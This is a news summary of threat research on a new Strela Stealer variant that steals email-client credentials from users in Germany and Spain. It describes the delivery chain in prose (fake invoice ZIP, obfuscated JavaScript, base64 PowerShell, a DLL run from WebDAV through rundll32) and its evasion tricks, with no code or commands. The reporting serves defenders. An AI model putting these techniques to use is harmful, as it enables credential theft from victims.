In a recent blog post, Cyble Research and Intelligence Labs (CRIL) researchers have revealed the discovery of a new variation of the Strela Stealer, marking a significant advancement in malware delivery techniques. This new iteration of the Strela Stealer demonstrates increased sophistication and stealth, highlighting the evolving landscape of cyber threats.
The latest campaign targeting Germany and Spain features versions in German, Spanish, and Basque languages. However, given the adaptable nature of malware, it is likely to be repurposed for other regions as seen with the initial version of the infostealer.
Initially identified by DCSO in 2022, the Strela Stealer is an infostealer designed to pilfer account credentials from popular email clients such as Microsoft Outlook and Mozilla Thunderbird. The malware initially focused on Spanish-speaking users, employing malicious ISO file attachments containing a .lnk file and a polyglot file. Subsequent evolutions involved ZIP attachments to distribute the malware.
The latest variant of the Strela Stealer incorporates heavily obfuscated JavaScript and base64-encoded PowerShell commands, significantly complicating detection and response efforts. Additionally, a new technique involves executing the DLL file directly from a WebDAV server without storing it on disk, enhancing its evasion capabilities.
This sophisticated malware is built to extract email configuration details and gather comprehensive system information, enabling threat actors to conduct reconnaissance and potentially launch further targeted attacks on compromised systems.
The new campaign initiates with a fake invoice notification for a recent purchase accompanied by a ZIP file attachment that contains obfuscated JavaScript code. The code, executed through WScript, launches a base64-encoded PowerShell command that executes a malicious DLL from a WebDAV server using “rundll32.exe” via the export function “Entry.”
By avoiding saving the DLL file on disk and directly accessing it from the WebDAV server, the malware evades detection by security products. The intricate JavaScript file utilizes string substitution to generate and execute hidden code, initiating a PowerShell command embedded within the script and a base64-encoded payload that contacts the server to execute the main payload.
The DLL file employs conditional jump instructions, making analysis more challenging and potentially causing disassemblers to crash. It decrypts additional data stored in its “.data” section using a hardcoded key and extracts the main payload, which runs through the “rundll32.exe” process.
Moreover, the malware includes language-based checks to target specific regions within Germany and Spain, indicating a tailored approach to its victims. The full blog post by Cyble provides additional details, MITRE ATT&CK techniques, and around 100 Indicators of Compromise (IoCs) for further investigation.
In conclusion, the emergence of this advanced Strela Stealer variant underscores the continuous evolution and sophistication of cyber threats, emphasizing the need for robust cybersecurity measures to protect against such malicious activities.